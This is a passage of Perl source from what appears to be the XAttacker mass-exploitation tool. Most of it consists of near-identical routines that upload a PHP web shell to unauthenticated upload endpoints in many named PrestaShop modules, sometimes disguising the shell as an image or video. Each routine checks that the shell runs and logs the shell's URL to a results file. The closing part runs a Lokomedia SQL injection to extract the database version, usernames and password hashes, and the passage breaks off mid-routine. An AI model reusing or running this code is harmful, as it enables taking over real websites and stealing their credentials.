1790 | print color('bold white'),"homepageadvertise2";
1791 | print color('bold white')," ................ ";
1792 | print color('bold red'),"NOt VULN\n";
1793 | }
1794 | }
1795 | 
1796 | ################ jro_homepageadvertise #####################
1797 | sub jro_homepageadvertise(){
1798 | my $url = "$site/modules/jro_homepageadvertise/uploadimage.php";
1799 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
1800 | 
1801 | $jro_homepageadvertiseup="$site/modules/jro_homepageadvertise/slides/XAttacker.php?X=Attacker";
1802 | 
1803 | my $checkjro_homepageadvertise = $ua->get("$jro_homepageadvertiseup")->content;
1804 | if($checkjro_homepageadvertise =~/X Attacker/) {
1805 | 
1806 | print color('bold red'),"[";
1807 | print color('bold green'),"+";
1808 | print color('bold red'),"] ";
1809 | print color('bold white'),"jro_homepageadvertise";
1810 | print color('bold white')," ............. ";
1811 | print color('bold green'),"VULN\n";
1812 | print color('bold green')," [";
1813 | print color('bold red'),"+";
1814 | print color('bold green'),"] ";
1815 | print color('bold white'),"Shell Uploaded Successfully\n";
1816 | print color('bold white'),"  [Link] => $jro_homepageadvertiseup\n";
1817 | open (TEXT, '>>Result/Shells.txt');
1818 | print TEXT "$jro_homepageadvertiseup\n";
1819 | close (TEXT);
1820 | }else{
1821 | print color('bold red'),"[";
1822 | print color('bold green'),"+";
1823 | print color('bold red'),"] ";
1824 | print color('bold white'),"jro_homepageadvertise";
1825 | print color('bold white')," ............. ";
1826 | print color('bold red'),"NOt VULN\n";
1827 | }
1828 | }
1829 | 
1830 | ################ attributewizardpro #####################
1831 | sub attributewizardpro(){
1832 | my $url = "$site/modules/attributewizardpro/file_upload.php";
1833 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
1834 | 
1835 | $attributewizardproup="$site/modules/attributewizardpro/file_uploads/XAttacker.php?X=Attacker";
1836 | 
1837 | my $checkattributewizardpro = $ua->get("$attributewizardproup")->content;
1838 | if($checkattributewizardpro =~/X Attacker/) {
1839 | 
1840 | print color('bold red'),"[";
1841 | print color('bold green'),"+";
1842 | print color('bold red'),"] ";
1843 | print color('bold white'),"attributewizardpro";
1844 | print color('bold white')," ................ ";
1845 | print color('bold green'),"VULN\n";
1846 | print color('bold green')," [";
1847 | print color('bold red'),"+";
1848 | print color('bold green'),"] ";
1849 | print color('bold white'),"Shell Uploaded Successfully\n";
1850 | print color('bold white'),"  [Link] => $attributewizardproup\n";
1851 | open (TEXT, '>>Result/Shells.txt');
1852 | print TEXT "$attributewizardproup\n";
1853 | close (TEXT);
1854 | }else{
1855 | print color('bold red'),"[";
1856 | print color('bold green'),"+";
1857 | print color('bold red'),"] ";
1858 | print color('bold white'),"attributewizardpro";
1859 | print color('bold white')," ................ ";
1860 | print color('bold red'),"NOt VULN\n";
1861 | }
1862 | }
1863 | 
1864 | ################ 1attributewizardpro #####################
1865 | sub oneattributewizardpro(){
1866 | my $url = "$site/modules/1attributewizardpro/file_upload.php";
1867 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
1868 | 
1869 | $oneattributewizardproup="$site/modules/1attributewizardpro/file_uploads/XAttacker.php?X=Attacker";
1870 | 
1871 | my $checkoneattributewizardpro = $ua->get("$oneattributewizardproup")->content;
1872 | if($checkoneattributewizardpro =~/X Attacker/) {
1873 | 
1874 | print color('bold red'),"[";
1875 | print color('bold green'),"+";
1876 | print color('bold red'),"] ";
1877 | print color('bold white'),"1attributewizardpro";
1878 | print color('bold white')," ............... ";
1879 | print color('bold green'),"VULN\n";
1880 | print color('bold green')," [";
1881 | print color('bold red'),"+";
1882 | print color('bold green'),"] ";
1883 | print color('bold white'),"Shell Uploaded Successfully\n";
1884 | print color('bold white'),"  [Link] => $oneattributewizardproup\n";
1885 | open (TEXT, '>>Result/Shells.txt');
1886 | print TEXT "$oneattributewizardproup\n";
1887 | close (TEXT);
1888 | }else{
1889 | print color('bold red'),"[";
1890 | print color('bold green'),"+";
1891 | print color('bold red'),"] ";
1892 | print color('bold white'),"1attributewizardpro";
1893 | print color('bold white')," ............... ";
1894 | print color('bold red'),"NOt VULN\n";
1895 | }
1896 | }
1897 | 
1898 | ################ attributewizardpro.OLD #####################
1899 | sub attributewizardproOLD(){
1900 | my $url = "$site/modules/attributewizardpro.OLD/file_upload.php";
1901 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
1902 | 
1903 | $attributewizardproOLDup="$site/modules/attributewizardpro.OLD/file_uploads/XAttacker.php?X=Attacker";
1904 | 
1905 | my $checkattributewizardproOLD = $ua->get("$attributewizardproOLDup")->content;
1906 | if($checkattributewizardproOLD =~/X Attacker/) {
1907 | 
1908 | print color('bold red'),"[";
1909 | print color('bold green'),"+";
1910 | print color('bold red'),"] ";
1911 | print color('bold white'),"Attributewizardpro.OLD";
1912 | print color('bold white')," ............ ";
1913 | print color('bold green'),"VULN\n";
1914 | print color('bold green')," [";
1915 | print color('bold red'),"+";
1916 | print color('bold green'),"] ";
1917 | print color('bold white'),"Shell Uploaded Successfully\n";
1918 | print color('bold white'),"  [Link] => $attributewizardproOLDup\n";
1919 | open (TEXT, '>>Result/Shells.txt');
1920 | print TEXT "$attributewizardproOLDup\n";
1921 | close (TEXT);
1922 | }else{
1923 | print color('bold red'),"[";
1924 | print color('bold green'),"+";
1925 | print color('bold red'),"] ";
1926 | print color('bold white'),"Attributewizardpro.OLD";
1927 | print color('bold white')," ............ ";
1928 | print color('bold red'),"NOt VULN\n";
1929 | }
1930 | }
1931 | 
1932 | 
1933 | ################ attributewizardpro_x #####################
1934 | sub attributewizardpro_x(){
1935 | my $url = "$site/modules/attributewizardpro_x/file_upload.php";
1936 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [userfile => ["XAttacker.php"],]);
1937 | 
1938 | $attributewizardpro_xup="$site/modules/attributewizardpro_x/file_uploads/XAttacker.php?X=Attacker";
1939 | 
1940 | my $checkattributewizardpro_x = $ua->get("$attributewizardpro_xup")->content;
1941 | if($checkattributewizardpro_x =~/X Attacker/) {
1942 | 
1943 | print color('bold red'),"[";
1944 | print color('bold green'),"+";
1945 | print color('bold red'),"] ";
1946 | print color('bold white'),"attributewizardpro_x";
1947 | print color('bold white')," .............. ";
1948 | print color('bold green'),"VULN\n";
1949 | print color('bold green')," [";
1950 | print color('bold red'),"+";
1951 | print color('bold green'),"] ";
1952 | print color('bold white'),"Shell Uploaded Successfully\n";
1953 | print color('bold white'),"  [Link] => $attributewizardpro_xup\n";
1954 | open (TEXT, '>>Result/Shells.txt');
1955 | print TEXT "$attributewizardpro_xup\n";
1956 | close (TEXT);
1957 | }else{
1958 | print color('bold red'),"[";
1959 | print color('bold green'),"+";
1960 | print color('bold red'),"] ";
1961 | print color('bold white'),"attributewizardpro_x";
1962 | print color('bold white')," .............. ";
1963 | print color('bold red'),"NOt VULN\n";
1964 | }
1965 | }
1966 | 
1967 | ################ advancedslider #####################
1968 | sub advancedslider(){
1969 | my $url = "$site/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php";
1970 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [qqfile => ["XAttacker.php.png"],]);
1971 | 
1972 | $advancedsliderup="$site/modules/advancedslider/uploads/XAttacker.php.png?X=Attacker";
1973 | 
1974 | my $checkadvancedslider = $ua->get("$advancedsliderup")->content;
1975 | if($checkadvancedslider =~/X Attacker/) {
1976 | 
1977 | print color('bold red'),"[";
1978 | print color('bold green'),"+";
1979 | print color('bold red'),"] ";
1980 | print color('bold white'),"advancedslider";
1981 | print color('bold white')," .................... ";
1982 | print color('bold green'),"VULN\n";
1983 | print color('bold green')," [";
1984 | print color('bold red'),"+";
1985 | print color('bold green'),"] ";
1986 | print color('bold white'),"Shell Uploaded Successfully\n";
1987 | print color('bold white'),"  [Link] => $advancedsliderup\n";
1988 | open (TEXT, '>>Result/Shells.txt');
1989 | print TEXT "$advancedsliderup\n";
1990 | close (TEXT);
1991 | }else{
1992 | print color('bold red'),"[";
1993 | print color('bold green'),"+";
1994 | print color('bold red'),"] ";
1995 | print color('bold white'),"advancedslider";
1996 | print color('bold white')," .................... ";
1997 | print color('bold red'),"NOt VULN\n";
1998 | }
1999 | }
2000 | 
2001 | ################ cartabandonmentpro #####################
2002 | sub cartabandonmentpro(){
2003 | my $url = "$site/modules/cartabandonmentpro/upload.php";
2004 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [image => ["XAttacker.php.png"],]);
2005 | 
2006 | $cartabandonmentproup="$site/modules/cartabandonmentpro/uploads/XAttacker.php.png?X=Attacker";
2007 | 
2008 | my $checkcartabandonmentpro = $ua->get("$cartabandonmentproup")->content;
2009 | if($checkcartabandonmentpro =~/X Attacker/) {
2010 | 
2011 | print color('bold red'),"[";
2012 | print color('bold green'),"+";
2013 | print color('bold red'),"] ";
2014 | print color('bold white'),"cartabandonmentpro";
2015 | print color('bold white')," ................ ";
2016 | print color('bold green'),"VULN\n";
2017 | print color('bold green')," [";
2018 | print color('bold red'),"+";
2019 | print color('bold green'),"] ";
2020 | print color('bold white'),"Shell Uploaded Successfully\n";
2021 | print color('bold white'),"  [Link] => $cartabandonmentproup\n";
2022 | open (TEXT, '>>Result/Shells.txt');
2023 | print TEXT "$cartabandonmentproup\n";
2024 | close (TEXT);
2025 | }else{
2026 | print color('bold red'),"[";
2027 | print color('bold green'),"+";
2028 | print color('bold red'),"] ";
2029 | print color('bold white'),"cartabandonmentpro";
2030 | print color('bold white')," ................ ";
2031 | print color('bold red'),"NOt VULN\n";
2032 | }
2033 | }
2034 | 
2035 | ################ cartabandonmentproOld #####################
2036 | sub cartabandonmentproOld(){
2037 | my $url = "$site/modules/cartabandonmentproOld/upload.php";
2038 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [image => ["XAttacker.php.png"],]);
2039 | 
2040 | $cartabandonmentproOldup="$site/modules/cartabandonmentproOld/uploads/XAttacker.php.png?X=Attacker";
2041 | 
2042 | my $checkcartabandonmentproOld = $ua->get("$cartabandonmentproOldup")->content;
2043 | if($checkcartabandonmentproOld =~/X Attacker/) {
2044 |   
2045 | print color('bold red'),"[";
2046 | print color('bold green'),"+";
2047 | print color('bold red'),"] ";
2048 | print color('bold white'),"cartabandonmentproOld";
2049 | print color('bold white')," ............. ";
2050 | print color('bold green'),"VULN\n";
2051 | print color('bold green')," [";
2052 | print color('bold red'),"+";
2053 | print color('bold green'),"] ";
2054 | print color('bold white'),"Shell Uploaded Successfully\n";
2055 | print color('bold white'),"  [Link] => $cartabandonmentproOldup\n";
2056 | open (TEXT, '>>Result/Shells.txt');
2057 | print TEXT "$cartabandonmentproOldup\n";
2058 | close (TEXT);
2059 | }else{
2060 | print color('bold red'),"[";
2061 | print color('bold green'),"+";
2062 | print color('bold red'),"] ";
2063 | print color('bold white'),"cartabandonmentproOld";
2064 | print color('bold white')," ............. ";
2065 | print color('bold red'),"NOt VULN\n";
2066 | }
2067 | }
2068 | 
2069 | ################ videostab #####################
2070 | sub videostab(){
2071 | my $url = "$site/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload";
2072 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [qqfile => ["XAttacker.php.mp4"],]);
2073 | 
2074 | $videostabup="$site/modules/videostab/uploads/XAttacker.php.mp4?X=Attacker";
2075 | 
2076 | my $checkvideostab = $ua->get("$videostabup")->content;
2077 | if($checkvideostab =~/X Attacker/) {
2078 | 
2079 | print color('bold red'),"[";
2080 | print color('bold green'),"+";
2081 | print color('bold red'),"] ";
2082 | print color('bold white'),"videostab";
2083 | print color('bold white')," ......................... ";
2084 | print color('bold green'),"VULN\n";
2085 | print color('bold green')," [";
2086 | print color('bold red'),"+";
2087 | print color('bold green'),"] ";
2088 | print color('bold white'),"Shell Uploaded Successfully\n";
2089 | print color('bold white'),"  [Link] => $videostabup\n";
2090 | open (TEXT, '>>Result/Shells.txt');
2091 | print TEXT "$videostabup\n";
2092 | close (TEXT);
2093 | }else{
2094 | print color('bold red'),"[";
2095 | print color('bold green'),"+";
2096 | print color('bold red'),"] ";
2097 | print color('bold white'),"videostab";
2098 | print color('bold white')," ......................... ";
2099 | print color('bold red'),"NOt VULN\n";
2100 | }
2101 | }
2102 | 
2103 | ################ wg24themeadministration #####################
2104 | sub wg24themeadministration(){
2105 | my $url = "$site/modules//wg24themeadministration/wg24_ajax.php";
2106 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', data => 'bajatax', type => 'pattern_upload', Content => [bajatax => ["XAttacker.php"],]);
2107 | 
2108 | $wg24themeadministrationup="$site/modules//wg24themeadministration///img/upload/XAttacker.php?X=Attacker";
2109 | 
2110 | my $checkwg24themeadministration = $ua->get("$wg24themeadministrationup")->content;
2111 | if($checkwg24themeadministration =~/X Attacker/) {
2112 | 
2113 | print color('bold red'),"[";
2114 | print color('bold green'),"+";
2115 | print color('bold red'),"] ";
2116 | print color('bold white'),"wg24themeadministration";
2117 | print color('bold white')," ........... ";
2118 | print color('bold green'),"VULN\n";
2119 | print color('bold green')," [";
2120 | print color('bold red'),"+";
2121 | print color('bold green'),"] ";
2122 | print color('bold white'),"Shell Uploaded Successfully\n";
2123 | print color('bold white'),"  [Link] => $wg24themeadministrationup\n";
2124 | open (TEXT, '>>Result/Shells.txt');
2125 | print TEXT "$wg24themeadministrationup\n";
2126 | close (TEXT);
2127 | }else{
2128 | print color('bold red'),"[";
2129 | print color('bold green'),"+";
2130 | print color('bold red'),"] ";
2131 | print color('bold white'),"wg24themeadministration";
2132 | print color('bold white')," ........... ";
2133 | print color('bold red'),"NOt VULN\n";
2134 | }
2135 | }
2136 | 
2137 | ################ fieldvmegamenu #####################
2138 | sub fieldvmegamenu(){
2139 | my $url = "$site/modules/fieldvmegamenu/ajax/upload.php";
2140 | my $shell ="XAttacker.php";
2141 | my $field_name = "images[]";
2142 | 
2143 | my $response = $ua->post( $url,
2144 |             Content_Type => 'multipart/form-data',
2145 |             Content => [ $field_name => ["$shell"] ]
2146 |            
2147 |             );
2148 | $fieldvmegamenuup="$site/modules/fieldvmegamenu/uploads/XAttacker.php?X=Attacker";
2149 | 
2150 | my $checkfieldvmegamenu = $ua->get("$fieldvmegamenuup")->content;
2151 | if($checkfieldvmegamenu =~/X Attacker/) {
2152 | 
2153 | print color('bold red'),"[";
2154 | print color('bold green'),"+";
2155 | print color('bold red'),"] ";
2156 | print color('bold white'),"fieldvmegamenu";
2157 | print color('bold white')," .................... ";
2158 | print color('bold green'),"VULN\n";
2159 | print color('bold green')," [";
2160 | print color('bold red'),"+";
2161 | print color('bold green'),"] ";
2162 | print color('bold white'),"Shell Uploaded Successfully\n";
2163 | print color('bold white'),"  [Link] => $fieldvmegamenuup\n";
2164 | open (TEXT, '>>Result/Shells.txt');
2165 | print TEXT "$fieldvmegamenuup\n";
2166 | close (TEXT);
2167 | }else{
2168 | print color('bold red'),"[";
2169 | print color('bold green'),"+";
2170 | print color('bold red'),"] ";
2171 | print color('bold white'),"fieldvmegamenu";
2172 | print color('bold white')," .................... ";
2173 | print color('bold red'),"NOt VULN\n";
2174 | }
2175 | }
2176 | 
2177 | 
2178 | ################ wdoptionpanel #####################
2179 | sub wdoptionpanel(){
2180 | my $url = "$site/modules/wdoptionpanel/wdoptionpanel_ajax.php";
2181 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', data => 'bajatax', type => 'image_upload', Content => [bajatax => ["XAttacker.php"],]);
2182 | 
2183 | $wdoptionpanelup="$site/modules/wdoptionpanel/upload/XAttacker.php?X=Attacker";
2184 | 
2185 | my $checkwdoptionpanel = $ua->get("$wdoptionpanelup")->content;
2186 | if($checkwdoptionpanel =~/X Attacker/) {
2187 | 
2188 | print color('bold red'),"[";
2189 | print color('bold green'),"+";
2190 | print color('bold red'),"] ";
2191 | print color('bold white'),"wdoptionpanel";
2192 | print color('bold white')," ..................... ";
2193 | print color('bold green'),"VULN\n";
2194 | print color('bold green')," [";
2195 | print color('bold red'),"+";
2196 | print color('bold green'),"] ";
2197 | print color('bold white'),"Shell Uploaded Successfully\n";
2198 | print color('bold white'),"  [Link] => $wdoptionpanelup\n";
2199 | open (TEXT, '>>Result/Shells.txt');
2200 | print TEXT "$wdoptionpanelup\n";
2201 | close (TEXT);
2202 | }else{
2203 | print color('bold red'),"[";
2204 | print color('bold green'),"+";
2205 | print color('bold red'),"] ";
2206 | print color('bold white'),"wdoptionpanel";
2207 | print color('bold white')," ..................... ";
2208 | print color('bold red'),"NOt VULN\n";
2209 | }
2210 | }
2211 | 
2212 | 
2213 | ################ pk_flexmenu #####################
2214 | sub pk_flexmenu(){
2215 | my $url = "$site/modules/pk_flexmenu/ajax/upload.php";
2216 | my $shell ="XAttacker.php";
2217 | my $field_name = "images[]";
2218 | 
2219 | my $response = $ua->post( $url,
2220 |             Content_Type => 'multipart/form-data',
2221 |             Content => [ $field_name => ["$shell"] ]
2222 |            
2223 |             );
2224 | $pk_flexmenuup="$site/modules/pk_flexmenu/uploads/XAttacker.php?X=Attacker";
2225 | 
2226 | my $checkpk_flexmenu = $ua->get("$pk_flexmenuup")->content;
2227 | if($checkpk_flexmenu =~/X Attacker/) {
2228 | 
2229 | print color('bold red'),"[";
2230 | print color('bold green'),"+";
2231 | print color('bold red'),"] ";
2232 | print color('bold white'),"pk_flexmenu";
2233 | print color('bold white')," ....................... ";
2234 | print color('bold green'),"VULN\n";
2235 | print color('bold green')," [";
2236 | print color('bold red'),"+";
2237 | print color('bold green'),"] ";
2238 | print color('bold white'),"Shell Uploaded Successfully\n";
2239 | print color('bold white'),"  [Link] => $pk_flexmenuup\n";
2240 | open (TEXT, '>>Result/Shells.txt');
2241 | print TEXT "$pk_flexmenuup\n";
2242 | close (TEXT);
2243 | }else{
2244 | print color('bold red'),"[";
2245 | print color('bold green'),"+";
2246 | print color('bold red'),"] ";
2247 | print color('bold white'),"pk_flexmenu";
2248 | print color('bold white')," ....................... ";
2249 | print color('bold red'),"NOt VULN\n";
2250 | }
2251 | }
2252 | 
2253 | ################ pk_vertflexmenu #####################
2254 | sub pk_vertflexmenu(){
2255 | my $url = "$site/modules/pk_vertflexmenu/ajax/upload.php";
2256 | my $shell ="XAttacker.php";
2257 | my $field_name = "images[]";
2258 | 
2259 | my $response = $ua->post( $url,
2260 |             Content_Type => 'multipart/form-data',
2261 |             Content => [ $field_name => ["$shell"] ]
2262 |            
2263 |             );
2264 | $pk_vertflexmenuup="$site/modules/pk_vertflexmenu/uploads/XAttacker.php?X=Attacker";
2265 | 
2266 | my $checkpk_vertflexmenu = $ua->get("$pk_vertflexmenuup")->content;
2267 | if($checkpk_vertflexmenu =~/X Attacker/) {
2268 | 
2269 | print color('bold red'),"[";
2270 | print color('bold green'),"+";
2271 | print color('bold red'),"] ";
2272 | print color('bold white'),"pk_vertflexmenu";
2273 | print color('bold white')," ................... ";
2274 | print color('bold green'),"VULN\n";
2275 | print color('bold green')," [";
2276 | print color('bold red'),"+";
2277 | print color('bold green'),"] ";
2278 | print color('bold white'),"Shell Uploaded Successfully\n";
2279 | print color('bold white'),"  [Link] => $pk_vertflexmenuup\n";
2280 | 
2281 | open (TEXT, '>>Result/Shells.txt');
2282 | print TEXT "$pk_vertflexmenuup\n";
2283 | close (TEXT);
2284 | }else{
2285 | print color('bold red'),"[";
2286 | print color('bold green'),"+";
2287 | print color('bold red'),"] ";
2288 | print color('bold white'),"pk_vertflexmenu";
2289 | print color('bold white')," ................... ";
2290 | print color('bold red'),"NOt VULN\n";
2291 | }
2292 | }
2293 | 
2294 | ################ nvn_export_orders #####################
2295 | sub nvn_export_orders(){
2296 | my $url = "$site/modules/nvn_export_orders/upload.php";
2297 | my $shell ="nvn_extra_add.php";
2298 | my $field_name = "images[]";
2299 | 
2300 | my $response = $ua->post( $url,
2301 |             Content_Type => 'multipart/form-data',
2302 |             Content => [ $field_name => ["$shell"] ]
2303 |            
2304 |             );
2305 | $nvn_export_ordersup="$site/modules/nvn_export_orders/nvn_extra_add.php?X=Attacker";
2306 | 
2307 | my $checknvn_export_orders = $ua->get("$nvn_export_ordersup")->content;
2308 | if($checknvn_export_orders =~/X Attacker/) {
2309 | 
2310 | print color('bold red'),"[";
2311 | print color('bold green'),"+";
2312 | print color('bold red'),"] ";
2313 | print color('bold white'),"nvn_export_orders";
2314 | print color('bold white')," ................. ";
2315 | print color('bold green'),"VULN\n";
2316 | print color('bold green')," [";
2317 | print color('bold red'),"+";
2318 | print color('bold green'),"] ";
2319 | print color('bold white'),"Shell Uploaded Successfully\n";
2320 | print color('bold white'),"  [Link] => $nvn_export_ordersup\n";
2321 | open (TEXT, '>>Result/Shells.txt');
2322 | print TEXT "$nvn_export_ordersup\n";
2323 | close (TEXT);
2324 | }else{
2325 | print color('bold red'),"[";
2326 | print color('bold green'),"+";
2327 | print color('bold red'),"] ";
2328 | print color('bold white'),"nvn_export_orders";
2329 | print color('bold white')," ................. ";
2330 | print color('bold red'),"NOt VULN\n";
2331 | }
2332 | }
2333 | 
2334 | ################ megamenu #####################
2335 | sub megamenu(){
2336 | my $url = "$site/modules/megamenu/uploadify/uploadify.php?id=XAttacker.php";
2337 | my $shell ="XAttacker.php.png";
2338 | my $field_name = "Filedata";
2339 | 
2340 | my $response = $ua->post( $url,
2341 |             Content_Type => 'multipart/form-data',
2342 |             Content => [ $field_name => ["$shell"] ]
2343 |            
2344 |             );
2345 | $megamenuup="$site/XAttacker.php.png?X=Attacker";
2346 | 
2347 | my $checkmegamenu = $ua->get("$megamenuup")->content;
2348 | if($checkmegamenu =~/X Attacker/) {
2349 | 
2350 | print color('bold red'),"[";
2351 | print color('bold green'),"+";
2352 | print color('bold red'),"] ";
2353 | print color('bold white'),"megamenu";
2354 | print color('bold white')," .......................... ";
2355 | print color('bold green'),"VULN\n";
2356 | print color('bold green')," [";
2357 | print color('bold red'),"+";
2358 | print color('bold green'),"] ";
2359 | print color('bold white'),"Shell Uploaded Successfully\n";
2360 | print color('bold white'),"  [Link] => $megamenuup\n";
2361 | open (TEXT, '>>Result/Shells.txt');
2362 | print TEXT "$megamenuup\n";
2363 | close (TEXT);
2364 | }else{
2365 | print color('bold red'),"[";
2366 | print color('bold green'),"+";
2367 | print color('bold red'),"] ";
2368 | print color('bold white'),"megamenu";
2369 | print color('bold white')," .......................... ";
2370 | print color('bold red'),"NOt VULN\n";
2371 | }
2372 | }
2373 | 
2374 | ################ tdpsthemeoptionpanel #####################
2375 | sub tdpsthemeoptionpanel(){
2376 | my $url = "$site/modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php";
2377 | my $shell ="XAttacker.php";
2378 | my $field_name = "image_upload";
2379 | 
2380 | my $response = $ua->post( $url,
2381 |             Content_Type => 'multipart/form-data',
2382 |             data => 'bajatax',
2383 |             Content => [ $field_name => ["$shell"] ]
2384 |            
2385 |             );
2386 | $tdpsthemeoptionpanelup="$site/modules/tdpsthemeoptionpanel/upload/XAttacker.php?X=Attacker";
2387 | 
2388 | my $checktdpsthemeoptionpanel = $ua->get("$tdpsthemeoptionpanelup")->content;
2389 | if($checktdpsthemeoptionpanel =~/X Attacker/) {
2390 | 
2391 | print color('bold red'),"[";
2392 | print color('bold green'),"+";
2393 | print color('bold red'),"] ";
2394 | print color('bold white'),"tdpsthemeoptionpanel";
2395 | print color('bold white')," .............. ";
2396 | print color('bold green'),"VULN\n";
2397 | print color('bold green')," [";
2398 | print color('bold red'),"+";
2399 | print color('bold green'),"] ";
2400 | print color('bold white'),"Shell Uploaded Successfully\n";
2401 | print color('bold white'),"  [Link] => $tdpsthemeoptionpanelup\n";
2402 | open (TEXT, '>>Result/Shells.txt');
2403 | print TEXT "$tdpsthemeoptionpanelup\n";
2404 | close (TEXT);
2405 | }else{
2406 | print color('bold red'),"[";
2407 | print color('bold green'),"+";
2408 | print color('bold red'),"] ";
2409 | print color('bold white'),"tdpsthemeoptionpanel";
2410 | print color('bold white')," .............. ";
2411 | print color('bold red'),"NOt VULN\n";
2412 | }
2413 | }
2414 | 
2415 | 
2416 | ################ psmodthemeoptionpanel #####################
2417 | sub psmodthemeoptionpanel(){
2418 | my $url = "$site/modules/psmodthemeoptionpanel/psmodthemeoptionpanel_ajax.php";
2419 | my $shell ="XAttacker.php";
2420 | my $field_name = "image_upload";
2421 | 
2422 | my $response = $ua->post( $url,
2423 |             Content_Type => 'multipart/form-data',
2424 |             data => 'bajatax',
2425 |             Content => [ $field_name => ["$shell"] ]
2426 |            
2427 |             );
2428 | $psmodthemeoptionpanelup="$site/modules/psmodthemeoptionpanel/upload/XAttacker.php?X=Attacker";
2429 | 
2430 | my $checkpsmodthemeoptionpanel = $ua->get("$psmodthemeoptionpanelup")->content;
2431 | if($checkpsmodthemeoptionpanel =~/X Attacker/) {
2432 | 
2433 | print color('bold red'),"[";
2434 | print color('bold green'),"+";
2435 | print color('bold red'),"] ";
2436 | print color('bold white'),"psmodthemeoptionpanel";
2437 | print color('bold white')," ............. ";
2438 | print color('bold green'),"VULN\n";
2439 | print color('bold green')," [";
2440 | print color('bold red'),"+";
2441 | print color('bold green'),"] ";
2442 | print color('bold white'),"Shell Uploaded Successfully\n";
2443 | print color('bold white'),"  [Link] => $psmodthemeoptionpanelup\n";
2444 | open (TEXT, '>>Result/Shells.txt');
2445 | print TEXT "$psmodthemeoptionpanelup\n";
2446 | close (TEXT);
2447 | }else{
2448 | print color('bold red'),"[";
2449 | print color('bold green'),"+";
2450 | print color('bold red'),"] ";
2451 | print color('bold white'),"psmodthemeoptionpanel";
2452 | print color('bold white')," ............. ";
2453 | print color('bold red'),"NOt VULN\n";
2454 | }
2455 | }
2456 | 
2457 | 
2458 | ################ masseditproduct #####################
2459 | sub masseditproduct(){
2460 | my $url = "$site/modules/lib/redactor/file_upload.php";
2461 | my $shell ="XAttacker.php";
2462 | my $field_name = "file";
2463 | 
2464 | my $response = $ua->post( $url,
2465 |             Content_Type => 'multipart/form-data',
2466 |             Content => [ $field_name => ["$shell"] ]
2467 |            
2468 |             );
2469 | $masseditproductup="$site/masseditproduct/uploads/file/XAttacker.php?X=Attacker";
2470 | 
2471 | my $checkmasseditproduct = $ua->get("$masseditproductup")->content;
2472 | if($checkmasseditproduct =~/X Attacker/) {
2473 | 
2474 | print color('bold red'),"[";
2475 | print color('bold green'),"+";
2476 | print color('bold red'),"] ";
2477 | print color('bold white'),"masseditproduct";
2478 | print color('bold white')," ................... ";
2479 | print color('bold green'),"VULN\n";
2480 | print color('bold green')," [";
2481 | print color('bold red'),"+";
2482 | print color('bold green'),"] ";
2483 | print color('bold white'),"Shell Uploaded Successfully\n";
2484 | print color('bold white'),"  [Link] => $masseditproductup\n";
2485 | open (TEXT, '>>Result/Shells.txt');
2486 | print TEXT "$masseditproductup\n";
2487 | close (TEXT);
2488 | }else{
2489 | print color('bold red'),"[";
2490 | print color('bold green'),"+";
2491 | print color('bold red'),"] ";
2492 | print color('bold white'),"masseditproduct";
2493 | print color('bold white')," ................... ";
2494 | print color('bold red'),"NOt VULN\n";
2495 | }
2496 | }
2497 | 
2498 | 
2499 | ################ lokomedia #####################
2500 | sub lokomedia(){
2501 | $lokoversion = "$site/statis--7'union select /*!50000Concat*/(Version())+from+users--+--+kantordesa.html";
2502 | $lokodatabase = "$site/statis--7'union select /*!50000Concat*/(Database())+from+users--+--+kantordesa.html";
2503 | $lokouserdata = "$site/statis--7'union select /*!50000Concat*/(USER())+from+users--+--+kantordesa.html";
2504 | $lokouser = "$site/statis--7'union select /*!50000Concat*/(username)+from+users--+--+kantordesa.html";
2505 | $lokopass = "$site/statis--7'union select /*!50000Concat*/(password)+from+users--+--+kantordesa.html";
2506 | 
2507 | my $checklokoversion = $ua->get("$lokoversion")->content;
2508 | if($checklokoversion =~/<meta name="description" content="(.*)">/) {
2509 | $dbv=$1;
2510 | 
2511 | if($dbv =~ /[a-z]/){
2512 | print color('bold green')," [";
2513 | print color('bold red'),"+";
2514 | print color('bold green'),"] ";
2515 | print color('bold white')," MySQL Version : $dbv\n";
2516 | open (TEXT, '>>Result/databases.txt');
2517 | print TEXT "\n[ DATABASE ]\n";
2518 | print TEXT "$site";
2519 | print TEXT "\nMySQL Version : $dbv";
2520 | close (TEXT);
2521 | my $checklokodatabase = $ua->get("$lokodatabase")->content;
2522 | if($checklokodatabase =~/<meta name="description" content="(.*)">/) {
2523 | $db=$1;
2524 | print color('bold green')," [";
2525 | print color('bold red'),"+";
2526 | print color('bold green'),"] ";
2527 | print color('bold white')," Current Database : $db\n";
2528 | open (TEXT, '>>Result/databases.txt');
2529 | print TEXT "\nCurrent Database : $db";
2530 | close (TEXT);
2531 | }
2532 | my $checklokouserdata = $ua->get("$lokouserdata")->content;
2533 | if($checklokouserdata =~/<meta name="description" content="(.*)">/) {
2534 | $udb=$1;
2535 | print color('bold green')," [";
2536 | print color('bold red'),"+";
2537 | print color('bold green'),"] ";
2538 | print color('bold white')," Current Username : $udb\n";
2539 | }
2540 | my $checklokouser = $ua->get("$lokouser")->content;
2541 | if($checklokouser =~/<meta name="description" content="(.*)">/) {
2542 | $user=$1;
2543 | print color('bold green')," [";
2544 | print color('bold red'),"+";
2545 | print color('bold green'),"] ";
2546 | print color('bold white')," Username : $user\n";
2547 | open (TEXT, '>>Result/databases.txt');
2548 | print TEXT "\nUsername : $user";
2549 | close (TEXT);
2550 | }
2551 | my $checklokopass = $ua->get("$lokopass")->content;
2552 | if($checklokopass =~/<meta name="description" content="(.*)">/) {
2553 | $hash=$1;
2554 | print color('bold green')," [";
2555 | print color('bold red'),"+";
2556 | print color('bold green'),"] ";
